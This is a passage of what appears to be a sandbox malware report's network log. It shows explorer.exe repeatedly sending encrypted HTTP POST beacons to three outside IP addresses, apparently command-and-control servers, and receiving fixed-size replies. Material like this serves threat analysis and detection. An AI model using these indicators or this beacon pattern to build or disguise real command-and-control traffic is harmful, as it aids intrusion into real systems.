                                                                                    2024-07-24 17:58:53 UTC685INData Raw: 47 48 53 31 5a 7a 42 70 79 66 4d 59 76 66 6b 73 41 59 47 67 56 43 74 36 42 57 30 77 62 6b 78 52 7a 4b 52 6f 71 6d 62 72 67 56 42 66 4e 70 47 79 55 57 54 57 52 79 79 6c 39 42 48 32 43 73 63 67 38 55 4f 61 43 69 6e 53 31 4b 64 6a 50 63 65 30 6f 53 2f 32 73 51 6c 77 62 33 78 72 66 6f 6e 69 43 41 74 74 66 30 2f 32 64 51 73 2b 66 41 36 6a 46 44 4a 58 4e 64 33 6c 4f 62 52 5a 62 44 2f 4b 4e 77 52 68 4e 59 58 61 39 66 43 63 4d 4b 6e 38 55 76 4d 47 41 6e 44 52 39 75 62 5a 33 42 43 38 4a 46 53 66 46 48 43 4e 48 44 6f 50 54 47 59 54 58 5a 71 5a 43 63 58 50 2b 56 39 62 41 34 4c 39 38 54 75 78 69 39 34 49 61 71 39 6c 2b 47 43 6f 62 41 55 6a 2b 62 77 6e 56 4f 6a 50 4d 69 57 50 67 49 4f 58 66 4d 5a 33 4c 31 57 32 53 76 2b 61 2f 36 34 35 69 49 37 47 45 74 46 34 37 70 69
                                                                                    Data Ascii: GHS1ZzBpyfMYvfksAYGgVCt6BW0wbkxRzKRoqmbrgVBfNpGyUWTWRyyl9BH2Cscg8UOaCinS1KdjPce0oS/2sQlwb3xrfoniCAttf0/2dQs+fA6jFDJXNd3lObRZbD/KNwRhNYXa9fCcMKn8UvMGAnDR9ubZ3BC8JFSfFHCNHDoPTGYTXZqZCcXP+V9bA4L98Tuxi94Iaq9l+GCobAUj+bwnVOjPMiWPgIOXfMZ3L1W2Sv+a/645iI7GEtF47pi


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    89192.168.2.1049846107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:54 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:58:54 UTC1122OUTData Raw: 58 56 61 31 7a 7a 43 75 68 37 47 73 46 63 6d 34 65 5a 71 52 59 38 66 6c 78 2b 46 66 2b 64 56 2f 79 4c 64 39 49 49 4f 49 36 75 4d 57 42 73 39 52 6c 6c 42 47 45 6f 45 5a 71 7a 42 6f 61 4c 76 77 7a 72 70 72 62 6f 64 32 47 79 75 4f 35 63 71 41 47 66 52 71 4f 49 75 65 61 4d 6a 42 48 47 4e 6c 2b 75 58 73 61 69 74 6f 4d 77 63 77 6e 48 6c 39 66 2f 52 53 73 4e 34 71 35 46 35 42 7a 5a 53 51 50 4b 4b 75 42 54 65 65 54 4d 72 69 30 67 56 6c 43 61 6d 4a 75 6e 47 54 32 67 56 76 55 4b 50 76 39 66 68 50 47 6a 6e 79 46 63 6d 49 69 73 63 4e 71 6a 35 70 49 5a 6c 61 68 6a 47 71 30 7a 47 4e 74 48 64 42 56 58 51 50 32 62 73 37 78 66 75 39 63 4b 34 6e 34 53 77 71 52 52 52 44 72 73 51 53 70 58 5a 33 30 46 4c 76 32 64 4d 44 6e 72 2b 4a 54 55 6f 64 4c 4e 64 6c 55 5a 73 58 4e 61 4c
                                                                                    Data Ascii: XVa1zzCuh7GsFcm4eZqRY8flx+Ff+dV/yLd9IIOI6uMWBs9RllBGEoEZqzBoaLvwzrprbod2GyuO5cqAGfRqOIueaMjBHGNl+uXsaitoMwcwnHl9f/RSsN4q5F5BzZSQPKKuBTeeTMri0gVlCamJunGT2gVvUKPv9fhPGjnyFcmIiscNqj5pIZlahjGq0zGNtHdBVXQP2bs7xfu9cK4n4SwqRRRDrsQSpXZ30FLv2dMDnr+JTUodLNdlUZsXNaL
                                                                                    2024-07-24 17:58:56 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:56 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:58:56 UTC685INData Raw: 53 5a 75 53 4b 6f 4c 5a 68 30 31 49 56 44 42 74 6f 78 72 31 67 6b 66 34 61 69 52 58 69 2f 5a 4e 57 45 6d 41 6a 2f 45 47 6d 74 2f 4b 35 46 7a 35 37 61 43 77 47 75 4a 61 62 30 5a 6a 77 78 50 52 75 64 50 61 77 57 53 46 5a 78 34 6c 59 43 39 79 53 66 76 69 42 61 36 65 65 74 5a 30 34 2b 6b 32 6c 6e 46 6c 51 56 36 2f 55 4c 32 36 67 6c 45 6c 74 36 6c 53 6d 56 55 62 34 62 65 66 63 74 79 45 59 72 73 61 36 39 68 48 70 64 6c 46 35 32 45 74 6b 67 73 66 31 35 50 64 79 4c 63 62 62 46 6f 38 5a 4a 7a 77 59 6c 6b 67 34 43 57 63 68 52 2f 4d 6e 69 45 55 43 43 4e 61 59 4b 70 45 57 43 50 31 70 77 46 48 55 32 75 57 56 4c 7a 6b 6e 38 4d 2f 48 42 4e 2b 72 42 44 68 74 34 4e 55 5a 6a 36 72 75 78 69 52 6c 4f 38 32 73 48 70 4a 50 43 2b 4b 6e 6f 50 4e 38 6f 57 7a 4f 59 44 43 61 41 39
                                                                                    Data Ascii: SZuSKoLZh01IVDBtoxr1gkf4aiRXi/ZNWEmAj/EGmt/K5Fz57aCwGuJab0ZjwxPRudPawWSFZx4lYC9ySfviBa6eetZ04+k2lnFlQV6/UL26glElt6lSmVUb4befctyEYrsa69hHpdlF52Etkgsf15PdyLcbbFo8ZJzwYlkg4CWchR/MniEUCCNaYKpEWCP1pwFHU2uWVLzkn8M/HBN+rBDht4NUZj6ruxiRlO82sHpJPC+KnoPN8oWzOYDCaA9


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    90192.168.2.1049848107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:56 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1267
                                                                                    2024-07-24 17:58:56 UTC1267OUTData Raw: 67 37 4e 38 66 4c 35 52 51 49 78 76 4c 4e 59 2f 71 6a 64 48 4d 5a 49 59 31 37 62 32 7a 38 68 43 54 2f 76 77 55 70 36 4f 6d 4a 56 55 4f 59 4e 6a 50 4a 61 65 50 7a 4e 35 45 4d 56 72 54 4f 4f 44 38 56 57 4e 67 76 73 6a 36 59 69 6b 70 39 34 6e 5a 2f 79 6a 79 4d 78 69 67 64 38 32 74 62 4c 46 57 4d 64 4a 31 6c 7a 48 42 6f 46 30 47 38 55 75 2b 57 30 6b 78 69 6c 56 4d 6e 6c 52 74 73 79 55 43 31 41 59 52 51 4c 6b 2b 6b 59 41 4d 74 65 6e 54 52 34 4f 65 33 2b 58 56 2f 56 53 53 34 44 33 35 72 6f 73 54 67 4a 59 79 37 36 2f 35 64 66 6b 67 6b 53 43 33 37 71 74 49 6f 79 66 2f 62 59 75 72 6f 6d 76 4f 52 51 48 51 69 44 71 39 71 49 2f 34 56 70 48 45 75 71 79 61 66 44 55 63 4d 41 4e 41 4b 30 59 70 6f 48 4c 69 64 79 74 4b 4e 49 4e 2f 6d 5a 70 4c 6c 43 58 45 54 71 54 69 6f 76
                                                                                    Data Ascii: g7N8fL5RQIxvLNY/qjdHMZIY17b2z8hCT/vwUp6OmJVUOYNjPJaePzN5EMVrTOOD8VWNgvsj6Yikp94nZ/yjyMxigd82tbLFWMdJ1lzHBoF0G8Uu+W0kxilVMnlRtsyUC1AYRQLk+kYAMtenTR4Oe3+XV/VSS4D35rosTgJYy76/5dfkgkSC37qtIoyf/bYuromvORQHQiDq9qI/4VpHEuqyafDUcMANAK0YpoHLidytKNIN/mZpLlCXETqTiov
                                                                                    2024-07-24 17:58:58 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:57 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:58:58 UTC685INData Raw: 4a 77 52 50 77 4a 72 33 50 70 65 55 55 6a 62 75 4a 4d 66 35 74 68 37 6d 49 48 36 32 46 72 71 56 4c 58 53 57 30 6a 79 35 4b 2b 30 47 30 6c 30 34 5a 4f 57 54 61 41 6e 69 34 50 37 57 30 49 43 62 2b 52 52 2f 35 77 59 38 46 6c 76 32 5a 61 4c 55 50 73 77 52 4d 77 6e 74 39 32 49 61 6f 64 6b 4c 70 4c 46 42 45 73 33 71 2f 37 32 32 37 6d 43 52 75 6e 62 39 6b 75 6c 30 44 69 32 44 70 70 5a 55 71 4d 69 45 72 42 2f 30 6b 68 68 5a 6c 2b 51 62 47 76 6c 6b 30 37 53 53 4c 4b 74 51 35 4d 33 4a 4e 47 72 35 64 51 38 73 5a 44 68 65 45 77 42 2f 68 52 4a 6e 79 6f 39 5a 32 6a 35 4e 36 61 74 69 77 57 6d 6d 69 38 66 62 41 74 65 43 6a 52 6e 2b 47 77 46 36 4c 42 4d 76 78 79 50 4f 4d 39 78 51 59 48 37 68 64 33 33 41 65 76 76 63 53 62 59 31 37 4a 69 4f 59 65 57 45 45 4b 6a 58 65 31 4a
                                                                                    Data Ascii: JwRPwJr3PpeUUjbuJMf5th7mIH62FrqVLXSW0jy5K+0G0l04ZOWTaAni4P7W0ICb+RR/5wY8Flv2ZaLUPswRMwnt92IaodkLpLFBEs3q/7227mCRunb9kul0Di2DppZUqMiErB/0khhZl+QbGvlk07SSLKtQ5M3JNGr5dQ8sZDheEwB/hRJnyo9Z2j5N6atiwWmmi8fbAteCjRn+GwF6LBMvxyPOM9xQYH7hd33AevvcSbY17JiOYeWEEKjXe1J


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    91192.168.2.1049849167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:58 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1267
                                                                                    2024-07-24 17:58:58 UTC1267OUTData Raw: 69 6b 56 59 55 43 65 6c 44 53 33 4b 52 50 6c 4a 33 39 76 31 79 79 66 39 59 78 45 5a 42 67 6c 39 56 59 30 42 62 52 5a 6d 32 70 5a 2b 44 4a 6b 6b 63 55 30 4f 34 32 59 44 50 4b 39 61 6b 41 37 31 34 36 43 55 44 58 63 63 47 71 41 42 52 45 2b 41 6a 30 61 6b 4e 38 64 56 67 61 2b 33 6e 32 6c 4f 41 37 4c 61 58 6d 33 30 35 63 6a 41 46 4c 54 49 67 55 6c 4b 30 39 63 51 36 34 6d 7a 45 39 33 79 45 42 71 4b 4d 43 6d 6d 35 59 48 52 45 4d 33 68 46 66 34 70 76 49 51 64 55 34 31 77 2f 63 7a 4f 2f 6e 6a 74 58 63 34 62 79 70 4d 46 49 71 58 4c 64 58 6d 79 67 79 5a 39 48 32 53 6e 67 38 4b 76 49 68 4e 6c 56 38 6e 48 71 75 69 39 67 73 66 75 2b 6e 71 73 33 57 6b 56 4e 2f 4b 41 76 62 69 4d 43 6d 63 47 48 33 50 34 2b 58 61 73 59 64 2b 76 43 46 78 52 64 53 61 45 6a 50 48 79 53 2f 76
                                                                                    Data Ascii: ikVYUCelDS3KRPlJ39v1yyf9YxEZBgl9VY0BbRZm2pZ+DJkkcU0O42YDPK9akA7146CUDXccGqABRE+Aj0akN8dVga+3n2lOA7LaXm305cjAFLTIgUlK09cQ64mzE93yEBqKMCmm5YHREM3hFf4pvIQdU41w/czO/njtXc4bypMFIqXLdXmygyZ9H2Sng8KvIhNlV8nHqui9gsfu+nqs3WkVN/KAvbiMCmcGH3P4+XasYd+vCFxRdSaEjPHyS/v
                                                                                    2024-07-24 17:59:00 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:59 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:59:00 UTC685INData Raw: 67 41 5a 55 52 6f 57 64 67 38 41 37 69 2f 43 52 56 42 35 57 31 42 71 30 6f 4d 4b 6b 4f 4d 6f 4a 68 53 47 43 79 6b 61 43 45 6f 75 4d 38 6d 4e 4c 36 42 2f 71 52 5a 50 69 64 31 37 4d 55 41 62 54 6c 61 35 5a 71 36 54 4b 71 65 79 6a 54 75 6a 61 5a 54 6e 67 64 44 65 76 73 78 4a 50 49 68 66 57 7a 42 35 73 58 6d 42 71 35 56 61 56 59 46 74 55 33 43 67 69 4f 31 52 4d 73 4d 36 39 52 65 6c 57 44 7a 4c 33 67 45 6c 70 48 73 30 53 45 4b 67 51 2b 4a 37 37 36 37 59 4a 4c 2f 5a 52 6f 30 31 5a 5a 38 35 78 68 67 4f 4d 6a 6c 64 78 69 69 57 55 4c 5a 43 4a 79 57 41 55 6b 2b 4d 34 4d 41 67 53 50 77 5a 64 48 56 70 5a 45 53 48 6a 73 44 4b 74 61 50 6d 77 63 2b 71 38 70 4d 36 4e 44 2b 64 56 4e 6a 44 6c 61 43 2b 47 54 37 44 44 6c 77 68 4a 6a 61 5a 4d 67 58 73 6f 35 32 6e 78 41 68 49
                                                                                    Data Ascii: gAZURoWdg8A7i/CRVB5W1Bq0oMKkOMoJhSGCykaCEouM8mNL6B/qRZPid17MUAbTla5Zq6TKqeyjTujaZTngdDevsxJPIhfWzB5sXmBq5VaVYFtU3CgiO1RMsM69RelWDzL3gElpHs0SEKgQ+J7767YJL/ZRo01ZZ85xhgOMjldxiiWULZCJyWAUk+M4MAgSPwZdHVpZESHjsDKtaPmwc+q8pM6ND+dVNjDlaC+GT7DDlwhJjaZMgXso52nxAhI


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    92192.168.2.1049850107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:59:00 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:59:00 UTC1122OUTData Raw: 69 4d 5a 69 79 6e 36 4b 67 4d 33 56 4f 74 6f 7a 75 52 4d 31 6e 6a 73 78 4c 35 34 67 4b 35 54 6d 6a 67 67 45 59 44 78 70 52 75 69 50 2f 7a 6d 55 66 63 65 32 76 30 30 6b 76 78 54 4e 72 47 6d 6a 6e 57 73 55 2f 4f 53 6f 4a 4a 64 48 52 73 69 46 2b 33 58 50 4f 4c 46 43 34 33 4a 2f 73 43 6b 6a 56 41 38 39 59 76 42 79 4b 66 75 74 66 36 37 58 6d 58 41 34 73 54 65 5a 56 77 6a 51 54 70 4f 74 48 57 72 56 74 33 61 48 59 58 30 70 70 64 62 50 54 6e 63 50 70 50 72 38 48 62 74 30 68 63 79 4b 63 71 6e 55 2f 6b 75 66 6b 32 79 57 76 7a 6f 4b 78 6a 6f 61 2f 6a 62 75 79 62 48 51 36 73 64 43 52 30 5a 64 76 2f 4b 4b 4a 6d 71 5a 44 51 77 56 61 32 35 4b 76 32 53 32 56 43 70 37 35 64 41 31 57 66 41 54 76 36 2f 72 6b 47 44 4a 2f 5a 64 33 70 4c 66 6a 36 61 31 52 36 75 32 71 32 62 79
                                                                                    Data Ascii: iMZiyn6KgM3VOtozuRM1njsxL54gK5TmjggEYDxpRuiP/zmUfce2v00kvxTNrGmjnWsU/OSoJJdHRsiF+3XPOLFC43J/sCkjVA89YvByKfutf67XmXA4sTeZVwjQTpOtHWrVt3aHYX0ppdbPTncPpPr8Hbt0hcyKcqnU/kufk2yWvzoKxjoa/jbuybHQ6sdCR0Zdv/KKJmqZDQwVa25Kv2S2VCp75dA1WfATv6/rkGDJ/Zd3pLfj6a1R6u2q2by
                                                                                    2024-07-24 17:59:02 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:59:02 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:59:02 UTC685INData Raw: 4e 4c 69 6c 30 63 77 76 30 46 51 50 61 55 38 65 4e 70 72 78 52 69 4c 7a 34 4c 39 69 6f 42 6e 44 77 63 43 2f 4a 75 70 37 51 6d 64 50 68 56 47 39 33 33 47 35 44 61 44 76 65 30 4d 6a 41 30 42 68 76 57 4c 64 61 64 31 6f 35 4c 33 70 55 75 76 44 73 6a 44 65 2b 2b 77 57 57 78 30 34 67 4b 4e 49 65 4e 49 73 53 7a 79 30 50 65 37 74 71 57 6d 6c 2b 64 53 73 50 44 75 64 66 61 2f 33 56 45 33 4f 31 72 46 43 58 63 75 39 69 57 49 41 55 62 35 74 55 4a 61 49 6d 76 66 2b 65 5a 62 34 73 79 34 46 52 4c 52 4b 75 53 53 51 41 44 33 63 4a 39 70 37 77 72 2f 6f 54 55 44 44 50 71 79 41 57 57 36 6f 43 61 53 50 7a 42 37 45 4d 47 76 52 72 4f 59 35 45 79 66 7a 2f 4c 51 76 6b 73 6d 4c 6a 75 68 30 42 34 43 43 49 31 36 4b 38 44 37 47 4a 30 31 39 51 76 6f 61 79 71 63 4d 68 41 6e 70 48 79 33
                                                                                    Data Ascii: NLil0cwv0FQPaU8eNprxRiLz4L9ioBnDwcC/Jup7QmdPhVG933G5DaDve0MjA0BhvWLdad1o5L3pUuvDsjDe++wWWx04gKNIeNIsSzy0Pe7tqWml+dSsPDudfa/3VE3O1rFCXcu9iWIAUb5tUJaImvf+eZb4sy4FRLRKuSSQAD3cJ9p7wr/oTUDDPqyAWW6oCaSPzB7EMGvRrOY5Eyfz/LQvksmLjuh0B4CCI16K8D7GJ019QvoayqcMhAnpHy3


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    93192.168.2.1049851107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:59:03 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:59:03 UTC1122OUTData Raw: 70 4c 35 4f 41 35 50 62 57 78 54 4a 57 56 75 41 67 47 5a 67 55 75 37 6e 36 75 5a 69 51 4e 34 42 68 6d 54 51 6d 71 4e 76 4b 49 46 36 30 50 45 4e 34 66 75 63 41 6d 55 67 6f 51 47 74 74 48 48 74 41 38 2b 2f 59 54 62 63 66 4c 30 50 32 78 45 55 36 6b 77 30 37 64 65 4d 68 53 37 6d 6b 56 78 49 37 31 75 66 4e 38 73 63 79 6b 37 57 67 70 31 30 55 39 59 2b 73 57 31 75 69 6b 6f 49 43 6f 4e 4a 36 74 44 68 35 49 42 37 67 6f 46 73 38 4c 4e 61 30 43 61 70 69 54 2f 46 37 4b 55 51 71 71 79 6a 66 30 31 70 35 49 41 36 52 78 68 54 49 33 52 48 49 54 37 69 71 54 30 50 62 65 58 59 4c 6f 4e 74 4e 49 48 6c 4a 65 62 2b 4a 74 62 45 51 65 4f 4d 62 34 32 4c 56 6d 6a 74 77 79 44 51 73 59 69 4e 76 4f 79 73 39 63 4f 76 38 65 36 38 2f 35 39 74 6c 59 61 2b 51 6d 6a 6e 56 74 4b 65 51 6d 78
                                                                                    Data Ascii: pL5OA5PbWxTJWVuAgGZgUu7n6uZiQN4BhmTQmqNvKIF60PEN4fucAmUgoQGttHHtA8+/YTbcfL0P2xEU6kw07deMhS7mkVxI71ufN8scyk7Wgp10U9Y+sW1uikoICoNJ6tDh5IB7goFs8LNa0CapiT/F7KUQqqyjf01p5IA6RxhTI3RHIT7iqT0PbeXYLoNtNIHlJeb+JtbEQeOMb42LVmjtwyDQsYiNvOys9cOv8e68/59tlYa+QmjnVtKeQmx
                                                                                    2024-07-24 17:59:04 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:59:04 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:59:04 UTC685INData Raw: 4c 63 52 5a 61 30 58 6c 75 4f 58 50 43 79 62 61 48 71 6b 69 7a 59 74 7a 74 67 64 74 69 36 54 54 73 4d 79 57 74 78 4a 2f 73 42 4a 43 30 50 2f 58 76 54 61 46 5a 51 61 31 53 6b 72 35 2b 52 52 67 57 70 4d 65 4a 48 78 4c 64 47 78 45 44 56 4a 78 4b 45 42 7a 64 61 72 51 4c 43 4e 6f 41 59 6f 46 71 31 45 7a 43 74 66 33 49 49 75 48 33 63 58 66 64 37 62 44 68 51 6c 4c 66 4b 57 63 63 74 45 4e 52 77 68 73 75 38 55 69 4b 6f 53 66 63 55 4e 2f 43 67 2b 79 39 4a 68 34 79 32 4c 49 45 68 55 62 6a 6f 31 70 32 35 55 38 52 38 4a 6a 52 63 78 57 73 6c 31 73 6c 79 6f 4d 31 63 6c 73 57 32 44 66 4b 36 2f 4f 67 54 69 5a 59 70 39 34 4b 36 38 57 45 46 45 49 53 46 71 30 69 37 46 73 71 64 71 62 6f 71 31 5a 6f 39 4c 4d 6a 69 65 4f 78 78 6d 63 72 75 68 74 47 50 64 47 31 59 34 79 75 38 47
                                                                                    Data Ascii: LcRZa0XluOXPCybaHqkizYtztgdti6TTsMyWtxJ/sBJC0P/XvTaFZQa1Skr5+RRgWpMeJHxLdGxEDVJxKEBzdarQLCNoAYoFq1EzCtf3IIuH3cXfd7bDhQlLfKWcctENRwhsu8UiKoSfcUN/Cg+y9Jh4y2LIEhUbjo1p25U8R8JjRcxWsl1slyoM1clsW2DfK6/OgTiZYp94K68WEFEISFq0i7Fsqdqboq1Zo9LMjieOxxmcruhtGPdG1Y4yu8G


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    94192.168.2.1049852167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:59:05 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:59:05 UTC1122OUTData Raw: 70 78 71 4b 74 65 33 6a 78 4c 6c 77 4d 44 54 7a 6b 4e 79 79 47 5a 37 61 74 75 59 64 59 46 56 36 51 2f 45 2b 4d 59 2f 6f 66 76 2b 4d 71 50 62 2b 42 79 78 46 37 50 4d 34 53 4d 69 67 59 77 31 6f 78 36 45 46 68 56 37 6b 34 5a 4f 7a 7a 67 66 38 75 67 39 67 42 6a 46 43 56 68 4e 77 58 2f 4a 71 36 56 47 42 5a 51 57 58 75 4d 41 73 52 4e 78 42 36 34 68 67 7a 70 7a 2b 65 44 6a 32 6a 70 2b 31 4c 6a 36 62 61 32 4e 55 70 34 47 33 72 75 50 6c 63 6a 6b 6d 55 72 50 72 67 30 48 79 51 57 68 75 50 72 48 4b 4d 59 44 43 70 4b 58 45 47 6c 32 4e 41 49 31 6a 6f 7a 55 39 6d 34 38 5a 46 2b 6a 47 31 35 2b 42 44 50 75 2f 57 38 48 6e 31 34 4b 79 32 77 4a 64 45 6b 31 77 55 59 6d 46 39 6b 42 4b 64 45 35 61 6f 46 4f 55 64 4b 55 36 7a 43 62 6b 61 57 5a 69 30 59 31 68 4f 70 7a 36 57 61 2f
                                                                                    Data Ascii: pxqKte3jxLlwMDTzkNyyGZ7atuYdYFV6Q/E+MY/ofv+MqPb+ByxF7PM4SMigYw1ox6EFhV7k4ZOzzgf8ug9gBjFCVhNwX/Jq6VGBZQWXuMAsRNxB64hgzpz+eDj2jp+1Lj6ba2NUp4G3ruPlcjkmUrPrg0HyQWhuPrHKMYDCpKXEGl2NAI1jozU9m48ZF+jG15+BDPu/W8Hn14Ky2wJdEk1wUYmF9kBKdE5aoFOUdKU6zCbkaWZi0Y1hOpz6Wa/
                                                                                    2024-07-24 17:59:06 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:59:06 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:59:06 UTC685INData Raw: 57 5a 7a 4f 63 2f 50 77 74 48 6e 65 77 4c 52 6e 62 33 42 64 41 63 55 68 4e 38 54 6e 32 43 79 73 53 72 50 34 70 31 42 52 56 53 71 4d 66 4e 38 57 4c 49 76 62 6a 56 68 78 33 32 77 50 47 4a 79 5a 56 56 44 79 6e 68 31 49 4e 4d 66 52 49 78 4f 6f 66 73 6f 53 4d 47 51 5a 76 4d 69 45 4e 74 6f 76 31 70 53 73 4d 79 6c 6c 78 4a 39 2b 54 62 6b 41 36 32 31 34 35 46 4e 48 49 58 2b 36 78 74 72 52 49 34 64 31 74 53 71 41 6e 36 6b 61 33 6a 6b 63 6f 78 4e 37 53 43 63 32 47 41 4a 56 6c 74 55 6c 5a 58 30 2f 46 62 7a 4b 55 42 36 75 6d 58 35 54 47 38 49 43 78 59 59 62 48 32 58 4b 57 39 78 7a 42 70 4e 67 66 4d 78 53 69 75 72 79 61 4c 38 55 65 54 75 2b 6b 41 36 37 37 4e 63 44 41 74 59 7a 5a 2b 52 78 4f 56 58 34 75 44 47 46 71 52 44 42 6f 6e 33 6c 63 47 50 6a 6f 67 64 44 55 30 64
                                                                                    Data Ascii: WZzOc/PwtHnewLRnb3BdAcUhN8Tn2CysSrP4p1BRVSqMfN8WLIvbjVhx32wPGJyZVVDynh1INMfRIxOofsoSMGQZvMiENtov1pSsMyllxJ9+TbkA62145FNHIX+6xtrRI4d1tSqAn6ka3jkcoxN7SCc2GAJVltUlZX0/FbzKUB6umX5TG8ICxYYbH2XKW9xzBpNgfMxSiuryaL8UeTu+kA677NcDAtYzZ+RxOVX4uDGFqRDBon3lcGPjogdDU0d


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    95192.168.2.1049853107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:59:07 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:59:07 UTC1122OUTData Raw: 59 72 32 54 6a 30 68 31 58 30 2f 71 55 72 31 45 6a 56 62 68 32 4c 63 53 39 44 65 58 2b 73 32 31 43 38 46 57 6a 56 59 34 45 4d 47 47 31 6d 55 4c 6d 4c 46 53 72 41 6a 30 33 4b 6a 4f 53 2b 31 38 34 64 69 72 79 2b 77 76 65 50 68 49 2b 48 70 75 57 66 5a 61 78 74 38 4f 32 69 57 36 46 70 6b 41 39 73 34 75 30 6e 41 72 31 61 6a 46 49 6f 6a 33 41 51 70 6f 37 58 5a 74 41 2f 59 71 66 68 6d 63 45 6b 64 54 4c 2b 74 4f 72 37 56 70 74 49 43 74 6e 6b 6a 32 6e 54 34 35 4d 75 58 54 53 4e 55 47 54 6a 55 41 62 57 79 6a 70 33 2f 70 63 2b 32 38 52 6a 6f 48 6b 38 6e 53 62 63 65 75 62 49 72 64 56 78 48 2b 48 4a 70 71 46 56 43 36 77 75 4e 37 2f 79 6f 4b 42 67 4a 77 6c 78 6f 79 47 62 77 53 30 4a 59 62 56 61 4f 72 55 56 57 48 68 47 62 69 4b 6a 39 6b 67 4d 4a 42 6d 77 4c 70 6a 45 4b
                                                                                    Data Ascii: Yr2Tj0h1X0/qUr1EjVbh2LcS9DeX+s21C8FWjVY4EMGG1mULmLFSrAj03KjOS+184diry+wvePhI+HpuWfZaxt8O2iW6FpkA9s4u0nAr1ajFIoj3AQpo7XZtA/YqfhmcEkdTL+tOr7VptICtnkj2nT45MuXTSNUGTjUAbWyjp3/pc+28RjoHk8nSbceubIrdVxH+HJpqFVC6wuN7/yoKBgJwlxoyGbwS0JYbVaOrUVWHhGbiKj9kgMJBmwLpjEK
                                                                                    2024-07-24 17:59:08 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:59:08 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
